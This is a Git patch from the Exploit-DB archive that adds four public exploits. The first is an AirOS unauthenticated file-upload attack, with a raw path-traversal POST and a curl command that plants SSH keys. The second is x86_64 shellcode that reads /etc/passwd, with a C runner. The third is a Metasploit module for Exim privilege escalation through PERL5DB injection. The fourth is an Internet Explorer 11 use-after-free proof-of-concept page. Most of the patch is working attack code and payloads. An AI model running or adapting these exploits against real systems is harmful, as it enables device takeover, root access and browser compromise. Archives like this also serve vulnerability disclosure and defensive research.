From 99627c8d04ec37100646e18d066f3383efa73be6 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 16 Apr 2016 05:02:22 +0000
Subject: [PATCH] DB: 2016-04-16

4 new exploits

Internet Explorer 11 - MSHTML!CMarkupPointer::UnEmbed Use After Free
Linux/x86_64 - Read /etc/passwd - 65 bytes
AirOS 6.x - Arbitrary File Upload
Exim _perl_startup_ Privilege Escalation
---
 files.csv                              |   4 +
 platforms/cgi/webapps/39701.txt        |  37 ++++++++
 platforms/lin_x86-64/shellcode/39700.c |  66 ++++++++++++++
 platforms/linux/local/39702.rb         |  59 +++++++++++++
 platforms/windows/dos/39699.html       | 114 +++++++++++++++++++++++++
 5 files changed, 280 insertions(+)
 create mode 100755 platforms/cgi/webapps/39701.txt
 create mode 100755 platforms/lin_x86-64/shellcode/39700.c
 create mode 100755 platforms/linux/local/39702.rb
 create mode 100755 platforms/windows/dos/39699.html

diff --git a/files.csv b/files.csv
index 0a956c9a6..b8eacd954 100755
--- a/files.csv
+++ b/files.csv
@@ -35917,3 +35917,7 @@ id,file,description,date,author,platform,type,port
 39696,platforms/hardware/webapps/39696.txt,"Brickcom Corporation Network Cameras - Multiple Vulnerabilities",2016-04-14,Orwelllabs,hardware,webapps,80
 39697,platforms/php/webapps/39697.txt,"PHPmongoDB 1.0.0 - Multiple Vulnerabilities",2016-04-14,"Ozer Goker",php,webapps,80
 39698,platforms/windows/remote/39698.html,"Internet Explorer 9_ 10_ 11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112)",2016-04-14,"Ashfaq Ansari",windows,remote,0
+39699,platforms/windows/dos/39699.html,"Internet Explorer 11 - MSHTML!CMarkupPointer::UnEmbed Use After Free",2016-04-15,"Marcin Ressel",windows,dos,0
+39700,platforms/lin_x86-64/shellcode/39700.c,"Linux/x86_64 - Read /etc/passwd - 65 bytes",2016-04-15,"Ajith Kp",lin_x86-64,shellcode,0
+39701,platforms/cgi/webapps/39701.txt,"AirOS 6.x - Arbitrary File Upload",2016-04-15,93c08539,cgi,webapps,443
+39702,platforms/linux/local/39702.rb,"Exim _perl_startup_ Privilege Escalation",2016-04-15,metasploit,linux,local,0
diff --git a/platforms/cgi/webapps/39701.txt b/platforms/cgi/webapps/39701.txt
new file mode 100755
index 000000000..6d0a5f798
--- /dev/null
+++ b/platforms/cgi/webapps/39701.txt
@@ -0,0 +1,37 @@
+EDB-Note Source: https://hackerone.com/reports/73480
+
+Vulnerability
+
+It's possible to overwrite any file (and create new ones) on AirMax systems, because the "php2" (maybe because of a patch) don't verify the "filename" value of a POST request. It's possible to a unauthenticated user to exploit this vulnerability.
+Example
+
+Consider the following request:
+
+POST https://192.168.1.20/login.cgi HTTP/1.1
+Cookie: $Version=0; AIROS_SESSIONID=9192de9ba81691e3e4d869a7207ec80f; $Path=/; ui_language=en_US
+Content-Type: multipart/form-data; boundary=---------------------------72971515916103336881230390860
+Content-Length: 773
+User-Agent: Jakarta Commons-HttpClient/3.1
+Host: 192.168.1.20
+Cookie: $Version=0; AIROS_SESSIONID=7597f7f30cec75e1faef8fb608fc43bb; $Path=/; ui_language=en_US
+
+-----------------------------72971515916103336881230390860
+Content-Disposition: form-data; name="keyfile"; filename="../../etc/dropbear/authorized_keys"
+Content-Type: application/vnd.ms-publisher
+
+{{Your Public Key HERE}}
+-----------------------------72971515916103336881230390860--
+
+The web server must filter the file name ../../etc/dropbear/authorized_keys to just authorized_keys or return a 404. But the AirMax just received the file, overwriting the original (creating if don't exist) in the process. In this case the attacker are uploading arbitrary public ssh keys, but it can be used to upload configurations, or "/etc/passwd"...
+Consequences
+
+It's possible to take control over any AirMax Product with simple forged http POST request, what it disastrous.
+
+
+Reproducing
+
+With a simple command:
+curl -F "file=@.ssh/id_rsa.pub;filename=../../etc/dropbear/authorized_keys" -H "Expect:" 'https://192.168.1.20/login.cgi' -k
+
+Of course if the ssh is disabled you can overwrite /etc/passwd and/or /tmp/system.cfg.
+
diff --git a/platforms/lin_x86-64/shellcode/39700.c b/platforms/lin_x86-64/shellcode/39700.c
new file mode 100755
index 000000000..1be3de32e
--- /dev/null
+++ b/platforms/lin_x86-64/shellcode/39700.c
@@ -0,0 +1,66 @@
+/*
+---------------------------------------------------------------------------------------------------
+
+Linux/x86_64 - Read /etc/passwd - 65 bytes
+
+Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
+
+Om Asato Maa Sad-Gamaya |
+Tamaso Maa Jyotir-Gamaya |
+Mrtyor-Maa Amrtam Gamaya |
+Om Shaantih Shaantih Shaantih |
+
+---------------------------------------------------------------------------------------------------
+Disassembly of section .text:
+
+Disassembly of section .text:
+
+0000000000400080 <.text>:
+  400080: eb 2f                 jmp    0x4000b1
+  400082: 5f                    pop    rdi
+  400083: 6a 02                 push   0x2
+  400085: 58                    pop    rax
+  400086: 48 31 f6              xor    rsi,rsi
+  400089: 0f 05                 syscall 
+  40008b: 66 81 ec ef 0f        sub    sp,0xfef
+  400090: 48 8d 34 24           lea    rsi,[rsp]
+  400094: 48 97                 xchg   rdi,rax
+  400096: 48 31 d2              xor    rdx,rdx
+  400099: 66 ba ef 0f           mov    dx,0xfef
+  40009d: 48 31 c0              xor    rax,rax
+  4000a0: 0f 05                 syscall 
+  4000a2: 6a 01                 push   0x1
+  4000a4: 5f                    pop    rdi
+  4000a5: 48 92                 xchg   rdx,rax
+  4000a7: 6a 01                 push   0x1
+  4000a9: 58                    pop    rax
+  4000aa: 0f 05                 syscall 
+  4000ac: 6a 3c                 push   0x3c
+  4000ae: 58                    pop    rax
+  4000af: 0f 05                 syscall 
+  4000b1: e8 cc ff ff ff        call   0x400082
+  4000b6: 2f                    (bad)  
+  4000b7: 65 74 63              gs je  0x40011d
+  4000ba: 2f                    (bad)  
+  4000bb: 70 61                 jo     0x40011e
+  4000bd: 73 73                 jae    0x400132
+  4000bf: 77 64                 ja     0x400125
+
+---------------------------------------------------------------------------------------------------
+
+How To Run
+
+$ gcc -o read_passwd read_passwd.c
+$ execstack -s read_passwd
+$ ./read_passwd
+
+---------------------------------------------------------------------------------------------------
+*/
+#include <stdio.h>
+char sh[]="\xeb\x2f\x5f\x6a\x02\x58\x48\x31\xf6\x0f\x05\x66\x81\xec\xef\x0f\x48\x8d\x34\x24\x48\x97\x48\x31\xd2\x66\xba\xef\x0f\x48\x31\xc0\x0f\x05\x6a\x01\x5f\x48\x92\x6a\x01\x58\x0f\x05\x6a\x3c\x58\x0f\x05\xe8\xcc\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
+void main(int argc, char **argv)
+{
+	int (*func)();
+	func = (int (*)()) sh;
+	(int)(*func)();
+}
diff --git a/platforms/linux/local/39702.rb b/platforms/linux/local/39702.rb
new file mode 100755
index 000000000..b7cb118a1
--- /dev/null
+++ b/platforms/linux/local/39702.rb
@@ -0,0 +1,59 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+
+  Rank = ExcellentRanking
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'Exim "perl_startup" Privilege Escalation',
+      'Description'     => %q{
+        This module exploits a Perl injection vulnerability in Exim < 4.86.2
+        given the presence of the "perl_startup" configuration parameter.
+      },
+      'Author'          => [
+        'Dawid Golunski', # Vulnerability discovery
+        'wvu'             # Metasploit module
+      ],
+      'References'      => [
+        %w{CVE 2016-1531},
+        %w{EDB 39549},
+        %w{URL http://www.exim.org/static/doc/CVE-2016-1531.txt}
+      ],
+      'DisclosureDate'  => 'Mar 10 2016',
+      'License'         => MSF_LICENSE,
+      'Platform'        => 'unix',
+      'Arch'            => ARCH_CMD,
+      'SessionTypes'    => %w{shell meterpreter},
+      'Privileged'      => true,
+      'Payload'         => {
+        'BadChars'      => "\x22\x27", # " and '
+        'Compat'        => {
+          'PayloadType' => 'cmd cmd_bash',
+          'RequiredCmd' => 'generic netcat netcat-e bash-tcp telnet'
+        }
+      },
+      'Targets'         => [
+        ['Exim < 4.86.2', {}]
+      ],
+      'DefaultTarget'   => 0
+    ))
+  end
+
+  def check
+    if exploit('whoami') == 'root'
+      CheckCode::Vulnerable
+    else
+      CheckCode::Safe
+    end
+  end
+
+  def exploit(c = payload.encoded)
+    # PERL5DB technique from http://perldoc.perl.org/perlrun.html
+    cmd_exec(%Q{PERL5OPT=-d PERL5DB='exec "#{c}"' exim -ps 2>&-})
+  end
+
+end
\ No newline at end of file
diff --git a/platforms/windows/dos/39699.html b/platforms/windows/dos/39699.html
new file mode 100755
index 000000000..e57ce62e5
--- /dev/null
+++ b/platforms/windows/dos/39699.html
@@ -0,0 +1,114 @@
+<!DOCTYPE html>
+<html>
+  <head>
+  <meta http-equiv="refresh" content="1"/>
+  <meta http-equiv="content-type" content="text/html; charset=UTF-8">
+  <meta http-equiv="Expires" content="0" />
+  <meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />
+  <meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />
+  <meta http-equiv="Pragma" content="no-cache" />
+  <style type="text/css">
+   body{
+        background-color:lime;
+        font-color:white;
+   };
+  </style>
+  <script type='text/javascript'></script>
+  <script type="text/javascript" language="JavaScript">
+      /*
+      *  Title: MSHTML!CMarkupPointer::UnEmbed Use After Free
+      *  Author: Marcin Ressel @ressel_m
+      *  Date: 15.04.2016
+      *  Vendor Homepage: www.microsoft.com
+      *  Software Link: n/a
+      *  Version: IE11 (latest)
+      *  Tested on: Windows 10 x64 && Windows 7 x64
+      *  --------------------------------------------------
+      *  IE 11 MSHTML!CMarkupPointer::UnEmbed Use After Free
+      *  IE 11.0.9600.18230 (win7)
+      *  Windows 7 x64, Windows 10 x64 (11.162.10586.0)
+      *  11.04.2016
+      *  
+         0:019> g
+         (490.1194): Access violation - code c0000005 (first chance)
+         First chance exceptions are reported before any exception handling.
+         This exception may be expected and handled.
+         eax=00000000 ebx=0df7bbd0 ecx=126e4f38 edx=00000000 esi=12750fd0 edi=00000000
+         eip=67028aa8 esp=0a97a658 ebp=0a97a7bc iopl=0         nv up ei pl nz ac po nc
+         cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010212
+         MSHTML!CSpliceTreeEngine::HandleRemovalMutations+0xdb:
+         67028aa8 8b7610          mov     esi,dword ptr [esi+10h] ds:002b:12750fe0=????????
+         0:007> !heap -p -a esi
+                address 12750fd0 found in
+                _DPH_HEAP_ROOT @ ad81000
+               in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
+                                    ffe3410:         12750000             2000
+               747790b2 verifier!AVrfDebugPageHeapFree+0x000000c2
+               77a5251c ntdll!RtlDebugFreeHeap+0x0000002f
+               77a0b2a2 ntdll!RtlpFreeHeap+0x0000005d
+               779b2ce5 ntdll!RtlFreeHeap+0x00000142
+               74a4adeb vrfcore!VerifierSetAPIClassName+0x0000017b
+               769d14bd kernel32!HeapFree+0x00000014
+               67011a67 MSHTML!MemoryProtection::HeapFree+0x00000046
+               66b08fff MSHTML!CMarkupPointer::UnEmbed+0x000000bd
+               66d75a96 MSHTML!CMarkupPointer::MoveToGap+0x00000094
+               67006183 MSHTML!CMarkupPointer::FindTextIdentity+0x000002b7
+               66d75a22 MSHTML!CDOMTextNode::GetParentNodeHelper+0x0000004b
+               6719351c MSHTML!CDOMNode::AppendTransientRegisteredObservers+0x00000035
+               66f192f7 MSHTML!CSpliceTreeEngine::HandleRemovalMutations+0xffef092a
+               66b47967 MSHTML!CSpliceTreeEngine::RemoveSplice+0x000051ef
+               66b49c9f MSHTML!CMarkup::SpliceTreeInternal+0x000000a8
+               66d8dc9b MSHTML!CDoc::CutCopyMove+0x00000d93
+               66b49a27 MSHTML!RemoveWithBreakOnEmpty+0x00000097
+               66b3400d MSHTML!CElement::InjectInternal+0x0000043f
+               66dd76d5 MSHTML!CElement::InjectTextOrHTML+0x00000323
+               66a857e8 MSHTML!CElement::Var_set_innerText+0x00000050
+               66a8576c MSHTML!CFastDOM::CHTMLElement::Trampoline_Set_innerText+0x0000003c
+               7330c572 jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x00000182
+               7330d075 jscript9!<lambda_73b9149c3f1de98aaab9368b6ff2ae9d>::operator()+0x0000009d
+               7330cfb2 jscript9!Js::JavascriptOperators::CallSetter+0x00000076
+               7333fdcc jscript9!Js::JavascriptOperators::SetProperty_Internal<0>+0x00000341
+               7333fb83 jscript9!Js::JavascriptOperators::OP_SetProperty+0x00000040
+               7333fc03 jscript9!Js::JavascriptOperators::PatchPutValueNoFastPath+0x0000004d
+               73308800 jscript9!Js::InterpreterStackFrame::Process+0x00002c1e
+               7330bd59 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x00000200
+      */
+			function testcase()
+			{
+        var elements = [];
+				var eFrame = document.getElementById("e1"); 
+        var tmp = eFrame.contentWindow.document.createElement("body");
+				elements.push(tmp); 
+				tmp = eFrame.contentWindow.document.createElement("cite"); 
+			  elements.push(tmp); 
+				tmp = eFrame.contentWindow.document.createElement("frame"); 
+			  elements.push(tmp); 
+				tmp = eFrame.contentWindow.document.createElement("ellipse"); 
+				elements.push(tmp); 
+				tmp = eFrame.contentWindow.document.createElement("html"); 
+				elements.push(tmp); 
+				tmp = eFrame.contentWindow.document.createElement("command"); 
+			  elements.push(tmp);
+        var trg = document; 
+				trg.body.appendChild(elements[0]); 
+				trg.body.appendChild(elements[1]); 
+				trg.body.appendChild(elements[2]); 
+				trg.body.appendChild(elements[3]); 
+				trg.body.appendChild(elements[4]); 
+				trg.body.appendChild(elements[5]); 
+        dom = document.getElementsByTagName("*"); 
+        doc = document; 
+				trg = dom[10]; 
+			  var observer = new MutationObserver(new Function("",""));
+			  observer.observe(trg,{ attributes: true, childList: true, characterData: true, subtree: true}); 
+				trg.insertAdjacentHTML("afterBegin","<tbody><ol><script><polygon><circle><table></table><command><table></table><rp>"); 
+			 	trg.innerText = '12345'; 	
+			}
+  </script>
+  <title>IE 11.0.9600.18230 MSHTML!CMarkupPointer::UnEmbed UAF POC</title>
+  </head>
+  <body onload='testcase();'>
+   <iframe id='t1'></iframe><iframe id='e1'></iframe>
+   <div id='oneUnArg'>||||</div>
+  </body>
+</html>